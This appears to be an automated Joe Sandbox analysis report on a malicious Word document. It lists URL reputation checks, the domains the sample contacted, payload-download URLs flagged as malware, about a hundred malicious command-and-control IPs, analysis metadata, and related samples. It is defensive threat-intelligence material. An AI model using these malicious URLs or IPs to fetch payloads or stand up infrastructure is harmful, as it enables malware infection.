http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://norailya.com/drupal/retAl/	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://ummahstars.com	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://hbprivileged.com	0%	Avira URL Cloud	safe
https://norailya.com	0%	Avira URL Cloud	safe
https://hbprivileged.comhZ	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://mrveggy.com/wp-admin/n/	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://www.teelekded.com/cgi-bin/LPo/	100%	Avira URL Cloud	malware
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://r3.i.lencr.org/0%	0%	Avira URL Cloud	safe
http://riandutra.com/email/AfhE8z0/	0%	Avira URL Cloud	safe
http://calledtochange.org/CalledtoChange/8huSOd/	100%	Avira URL Cloud	malware
https://ummahstars.com/app_old_may_2018/assets/wDL8x/	100%	Avira URL Cloud	malware
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://riandutra.com	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://mrveggy.com	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
https://hbprivileged.com/cgi-bin/Qg/	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://www.teelekded.com/cgi-bin/LPo/P	100%	Avira URL Cloud	malware
http://calledtochange.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
hbprivileged.com	35.209.96.32	true	true	unknown
mrveggy.com	177.12.170.95	true	true	unknown
ummahstars.com	35.163.191.195	true	true	unknown
riandutra.com	191.6.196.95	true	true	unknown
calledtochange.org	75.103.81.81	true	true	unknown
norailya.com	104.168.154.203	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://riandutra.com/email/AfhE8z0/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msnbc.com/news/ticker.txt	powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	false		high
http://ocsp.sectigo.com0	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://norailya.com/drupal/retAl/	powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	powershell.exe, 00000004.00000002.2171060185.000000001B57A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certificates.godaddy.com/repository/0	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false		high
https://ummahstars.com	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powershell.exe, 00000004.00000002.2170809388.000000001B538000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.litespeedtech.com	powershell.exe, 00000004.00000002.2169933231.0000000003D00000.00000004.00000001.sdmp	false		high
https://hbprivileged.com	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://norailya.com	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2169933231.0000000003D00000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://hbprivileged.comhZ	powershell.exe, 00000004.00000002.2170047084.0000000003D98000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icra.org/vocabulary/.	powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://mrveggy.com/wp-admin/n/	powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://investor.msn.com/	powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	false		high
https://sectigo.com/CPS0D	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.o.lencr.org0	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	powershell.exe, 00000004.00000002.2159574068.0000000002310000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2185682203.00000000027A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://www.teelekded.com/cgi-bin/LPo/	powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://certificates.godaddy.com/repository/gdig2.crt0	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net0D	powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	powershell.exe, 00000004.00000002.2173311963.000000001D2C0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://cps.root-x1.letsencrypt.org0	powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.i.lencr.org/0%	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	false		high
http://calledtochange.org/CalledtoChange/8huSOd/	powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com	powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	powershell.exe, 00000004.00000002.2171060185.000000001B57A000.00000004.00000001.sdmp	false		high
https://ummahstars.com/app_old_may_2018/assets/wDL8x/	powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://cps.letsencrypt.org0	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://riandutra.com	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://certs.godaddy.com/repository/1301	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false		high
https://certs.godaddy.com/repository/0	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	false		high
https://mrveggy.com	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	false		high
http://crl.godaddy.com/gdroot-g2.crl0F	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://hbprivileged.com/cgi-bin/Qg/	powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000004.00000002.2159574068.0000000002310000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	false		high
http://crl.godaddy.com/gdig2s1-1814.crl0	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.teelekded.com/cgi-bin/LPo/P	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.godaddy.com/gdroot.crl0F	powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	false		high
http://www.piriform.com/ccleaner	powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	false		high
https://secure.comodo.com/CPS0	powershell.exe, 00000004.00000002.2170553513.000000001B490000.00000004.00000001.sdmp	false		high
http://calledtochange.org	powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
81.214.253.80	unknown	Turkey	9121	TTNETTR	true
94.176.234.118	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
78.206.229.130	unknown	France	12322	PROXADFR	true
191.6.196.95	unknown	Brazil	28299	IPV6InternetLtdaBR	true
143.0.85.206	unknown	Brazil	263998	MMTelecomBR	true
51.15.7.145	unknown	France	12876	OnlineSASFR	true
209.236.123.42	unknown	United States	393398	ASN-DISUS	true
190.45.24.210	unknown	Chile	22047	VTRBANDAANCHASACL	true
5.196.35.138	unknown	France	16276	OVHFR	true
75.103.81.81	unknown	United States	14992	CRYSTALTECHUS	true
190.162.232.138	unknown	Chile	22047	VTRBANDAANCHASACL	true
152.231.89.226	unknown	Chile	6471	ENTELCHILESACL	true
50.28.51.143	unknown	United States	32244	LIQUIDWEBUS	true
217.160.169.110	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
152.170.79.100	unknown	Argentina	10318	TelecomArgentinaSAAR	true
149.202.72.142	unknown	France	16276	OVHFR	true
190.251.216.100	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
95.76.153.115	unknown	Romania	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	true
51.255.203.164	unknown	France	16276	OVHFR	true
45.16.226.117	unknown	United States	7018	ATT-INTERNET4US	true
12.163.208.58	unknown	United States	7018	ATT-INTERNET4US	true
202.134.4.210	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
68.183.170.114	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
190.64.88.186	unknown	Uruguay	6057	AdministracionNacionaldeTelecomunicacionesUY	true
177.85.167.10	unknown	Brazil	52743	TwisterSoftNetLtdaBR	true
190.210.246.253	unknown	Argentina	16814	NSSSAAR	true
1.226.84.243	unknown	Korea Republic of	9277	SKB-T-AS-KRSKBroadbandCoLtdKR	true
137.74.106.111	unknown	France	16276	OVHFR	true
172.104.169.32	unknown	United States	63949	LINODE-APLinodeLLCUS	true
178.250.54.208	unknown	United Kingdom	20860	IOMART-ASGB	true
81.17.93.134	unknown	Azerbaijan	28787	BAKINTER-ASBakinternetISPAzerbaijanAZ	true
110.39.160.38	unknown	Pakistan	38264	WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPK	true
80.15.100.37	unknown	France	3215	FranceTelecom-OrangeFR	true
46.101.58.37	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
177.23.7.151	unknown	Brazil	262886	LansofNetLTDAMEBR	true
83.169.21.32	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
70.32.115.157	unknown	United States	31815	MEDIATEMPLEUS	true
109.101.137.162	unknown	Romania	9050	RTDBucharestRomaniaRO	true
186.177.174.163	unknown	Costa Rica	262197	MILLICOMCABLECOSTARICASACR	true
85.105.239.184	unknown	Turkey	9121	TTNETTR	true
84.232.229.24	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true
91.233.197.70	unknown	Poland	199797	GRAMA-HOUSE-SRLRO	true
185.94.252.27	unknown	Germany	197890	MEGASERVERS-DE	true
178.211.45.66	unknown	Turkey	197328	INETLTDTR	true
188.135.15.49	unknown	Oman	50010	NAWRAS-ASSultanateofOmanOM	true
35.163.191.195	unknown	United States	16509	AMAZON-02US	true
122.201.23.45	unknown	Mongolia	17882	ASN-MCS-APAS-MCS-APCONVERTEDTOASN-MCS-APFORRPSLCOMP	true
81.215.230.173	unknown	Turkey	9121	TTNETTR	true
200.75.39.254	unknown	Colombia	19429	ETB-ColombiaCO	true
191.241.233.198	unknown	Brazil	28669	America-NETLtdaBR	true
111.67.12.221	unknown	Australia	55803	DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU	true
46.105.114.137	unknown	France	16276	OVHFR	true
110.39.162.2	unknown	Pakistan	38264	WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPK	true
70.32.84.74	unknown	United States	398110	GO-DADDY-COM-LLCUS	true
12.162.84.2	unknown	United States	7018	ATT-INTERNET4US	true
170.81.48.2	unknown	Brazil	263634	TACNETTELECOMBR	true
93.146.143.191	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
82.208.146.142	unknown	Romania	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	true
177.12.170.95	unknown	Brazil	28299	IPV6InternetLtdaBR	true
187.162.248.237	unknown	Mexico	6503	AxtelSABdeCVMX	true
185.183.16.47	unknown	Spain	201453	AKIWIFIAKIWIFIES	true
188.225.32.231	unknown	Russian Federation	9123	TIMEWEB-ASRU	true
201.185.69.28	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
68.183.190.199	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
191.223.36.170	unknown	Brazil	8167	BrasilTelecomSA-FilialDistritoFederalBR	true
93.149.120.214	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
181.30.61.163	unknown	Argentina	10318	TelecomArgentinaSAAR	true
80.249.176.206	unknown	Russian Federation	31376	SMART-ASRU	true
217.13.106.14	unknown	Hungary	12301	INVITECHHU	true
62.84.75.50	unknown	Lebanon	42334	BBP-ASLB	true
206.189.232.2	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
201.48.121.65	unknown	Brazil	16735	ALGARTELECOMSABR	true
167.71.148.58	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
85.214.26.7	unknown	Germany	6724	STRATOSTRATOAGDE	true
190.114.254.163	unknown	Chile	52368	ZAMLTDACL	true
172.245.248.239	unknown	United States	36352	AS-COLOCROSSINGUS	true
46.43.2.95	unknown	United Kingdom	35425	BYTEMARK-ASGB	true
31.27.59.105	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
104.131.41.185	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
87.106.46.107	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
209.33.120.130	unknown	United States	20115	CHARTER-20115US	true
105.209.235.113	unknown	South Africa	16637	MTNNS-ASZA	true
35.209.96.32	unknown	United States	19527	GOOGLE-2US	true
190.247.139.101	unknown	Argentina	10318	TelecomArgentinaSAAR	true
51.255.165.160	unknown	France	16276	OVHFR	true
212.71.237.140	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
138.197.99.250	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
181.10.46.92	unknown	Argentina	7303	TelecomArgentinaSAAR	true
82.48.39.246	unknown	Italy	3269	ASN-IBSNAZIT	true
104.168.154.203	unknown	United States	54290	HOSTWINDSUS	true
197.232.36.108	unknown	Kenya	36866	JTLKE	true
60.93.23.51	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	true
211.215.18.93	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
154.127.113.242	unknown	South Africa	37358	BITCOZA	true
192.175.111.212	unknown	Canada	32613	IWEB-ASCA	true
213.52.74.198	unknown	Norway	2116	ASN-CATCHCOMNO	true
152.169.22.67	unknown	Argentina	10318	TelecomArgentinaSAAR	true
138.97.60.141	unknown	Brazil	264130	GISTELECOMBR	true
190.24.243.186	unknown	Colombia	19429	ETB-ColombiaCO	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	351824
Start date:	11.02.2021
Start time:	10:31:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Io8ic2291n (renamed file extension from none to doc)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@32/14@6/99
EGA Information:	Successful, ratio: 92.3%
HDC Information:	Successful, ratio: 33.6% (good quality ratio 24.1%) Quality average: 58.5% Quality standard deviation: 37.9%
HCA Information:	Successful, ratio: 86% Number of executed functions: 33 Number of non-executed functions: 80
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 67.26.75.254, 8.253.204.121, 67.27.159.254, 8.248.135.254, 67.27.233.254 Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net Execution Graph export aborted for target powershell.exe, PID 1100 because it is empty Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/351824/sample/Io8ic2291n.doc

Simulations

Behavior and APIs

Time	Type	Description
10:31:39	API Interceptor	1x Sleep call for process: msg.exe modified
10:31:40	API Interceptor	253x Sleep call for process: powershell.exe modified
10:32:24	API Interceptor	147x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
81.214.253.80	http://buybywe.com/roundcube/installer/eaZ/	Get hash	malicious	Browse	81.214.253.80:443/BdD9uZ0nJukeWE
94.176.234.118	SpEQvgtnaR.exe	Get hash	malicious	Browse
	gPEkWaJGIA.exe	Get hash	malicious	Browse
	aXwo8YyqNu.exe	Get hash	malicious	Browse
	aof712Ufpl.exe	Get hash	malicious	Browse
78.206.229.130	jWSNNvF7jI.exe	Get hash	malicious	Browse	78.206.229.130/J1cQlpodbCqYssjN/AWAY8saYxSD37sga3O/nR2vB/WkbnNMRclxUa/sTe6G0RFy/
	iyfpc7Wzr1.exe	Get hash	malicious	Browse	78.206.229.130/NwQnA4Trdyz/zNIiB3/Z9nIWCiEXMFoCH2zl2C/yNWyOYKr04XJyG4/
	PTx3y7NeZz.exe	Get hash	malicious	Browse	78.206.229.130/RJzNTd2ktsUm5MOj9a/
	PPurZHOdqP.exe	Get hash	malicious	Browse	78.206.229.130/xRvjj17p6Al/yEnfa8PFVfmASaW2XVu/
	6F5yJkrcSA.exe	Get hash	malicious	Browse	78.206.229.130/UMNg/YYNa4coRgvpK5EkKz/oyB6RqK3fxBeG/
	LIST-2020_10_28.doc	Get hash	malicious	Browse	78.206.229.130/W7dyT5dRkq1J1I/sF42w0X/zEpIAA3/
	x9h8jPb70T.doc	Get hash	malicious	Browse	78.206.229.130/aUX92l/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
riandutra.com	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse	191.6.196.95
	FILE.doc	Get hash	malicious	Browse	191.6.196.95
	Untitled_7367763-38724.doc	Get hash	malicious	Browse	191.6.196.95
	INFO.doc	Get hash	malicious	Browse	191.6.196.95
	https://linkprotect.cudasvc.com/url?a=http%3a%2f%2friandutra.com%2fimg%2fswift%2f&c=E,1,2psJaj0WYUreFyZdWnlur90KNLioLAx1BkUl9obC1u3x-EHkVe7qTOGX0uUvePAb3A6BZOxOQ0Z9cjx5tujIZQvH2mAi1DK43vdah5aWJaFPHjsgOX6aYGo0wcc,&typo=1THX,Jennifer	Get hash	malicious	Browse	191.6.196.95
	KmTYOvCPfr.doc	Get hash	malicious	Browse	191.6.196.95
	aersUIITZI.doc	Get hash	malicious	Browse	191.6.196.95
	AKnPzbr0F4.doc	Get hash	malicious	Browse	191.6.196.95
	dacjlB7lAk.doc	Get hash	malicious	Browse	191.6.196.95
	mKCRYKmKpO.doc	Get hash	malicious	Browse	191.6.196.95
	wcHZ0mF90J.doc	Get hash	malicious	Browse	191.6.196.95
	hhm95ov8un.doc	Get hash	malicious	Browse	191.6.196.95
	K4ziGr614R.doc	Get hash	malicious	Browse	191.6.196.95
	6sANi023oS.doc	Get hash	malicious	Browse	191.6.196.95
	bIaql64CTa.doc	Get hash	malicious	Browse	191.6.196.95
	Jyud0uPIRu.doc	Get hash	malicious	Browse	191.6.196.95
	yH7WbTpvwU.doc	Get hash	malicious	Browse	191.6.196.95
	p3QPprGcL9.doc	Get hash	malicious	Browse	191.6.196.95
	3CEenXi4tj.doc	Get hash	malicious	Browse	191.6.196.95
	cbdbiBCPkK.doc	Get hash	malicious	Browse	191.6.196.95
mrveggy.com	68254_2001.doc	Get hash	malicious	Browse	177.12.170.95
	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse	177.12.170.95
	https://mrveggy.com/resgatecarrinho/jcWVa69vj8IDsQRCud8h6RNI9Mz17JqsPPJ0DFnlbXZGyMM2GcZ3/	Get hash	malicious	Browse	177.12.170.95
	KmTYOvCPfr.doc	Get hash	malicious	Browse	191.6.198.191
	aersUIITZI.doc	Get hash	malicious	Browse	191.6.198.191
	AKnPzbr0F4.doc	Get hash	malicious	Browse	191.6.198.191
	dacjlB7lAk.doc	Get hash	malicious	Browse	191.6.198.191
	mKCRYKmKpO.doc	Get hash	malicious	Browse	191.6.198.191
	wcHZ0mF90J.doc	Get hash	malicious	Browse	191.6.198.191
	hhm95ov8un.doc	Get hash	malicious	Browse	191.6.198.191
	K4ziGr614R.doc	Get hash	malicious	Browse	191.6.198.191
	6sANi023oS.doc	Get hash	malicious	Browse	191.6.198.191
	bIaql64CTa.doc	Get hash	malicious	Browse	191.6.198.191
	Jyud0uPIRu.doc	Get hash	malicious	Browse	191.6.198.191
	yH7WbTpvwU.doc	Get hash	malicious	Browse	191.6.198.191
	p3QPprGcL9.doc	Get hash	malicious	Browse	191.6.198.191
	3CEenXi4tj.doc	Get hash	malicious	Browse	191.6.198.191
	cbdbiBCPkK.doc	Get hash	malicious	Browse	191.6.198.191
	2Es3D1PlTF.doc	Get hash	malicious	Browse	191.6.198.191
	F734Y7dkLk.doc	Get hash	malicious	Browse	191.6.198.191
hbprivileged.com	68254_2001.doc	Get hash	malicious	Browse	35.209.96.32
	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse	35.209.96.32
	ARCH-SO-930373.doc	Get hash	malicious	Browse	35.209.96.32
ummahstars.com	68254_2001.doc	Get hash	malicious	Browse	35.163.191.195
	Documentaci#U00f3n.doc	Get hash	malicious	Browse	35.163.191.195
	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse	35.163.191.195
	Z8363664.doc	Get hash	malicious	Browse	35.163.191.195

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RACKRAYUABRakrejusLT	yytr.dll	Get hash	malicious	Browse	80.208.230.180
	xls.xls	Get hash	malicious	Browse	80.208.230.180
